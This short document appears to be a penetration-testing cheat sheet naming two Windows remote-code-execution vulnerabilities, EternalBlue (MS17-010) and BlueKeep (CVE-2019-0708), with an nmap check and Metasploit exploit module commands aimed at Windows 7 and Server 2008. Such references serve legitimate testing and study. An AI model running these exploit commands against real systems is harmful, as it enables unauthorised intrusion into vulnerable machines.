EternalBlue (SMB - MS17-010)

Win7 / Server 2008.

nmap -p 445 --script smb-vuln-ms17-010 <IP>
use exploit/windows/smb/ms17_010_eternalblue

BlueKeep (RDP - CVE-2019-0708)

Win7 / Server 2008.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Categories:

Updated: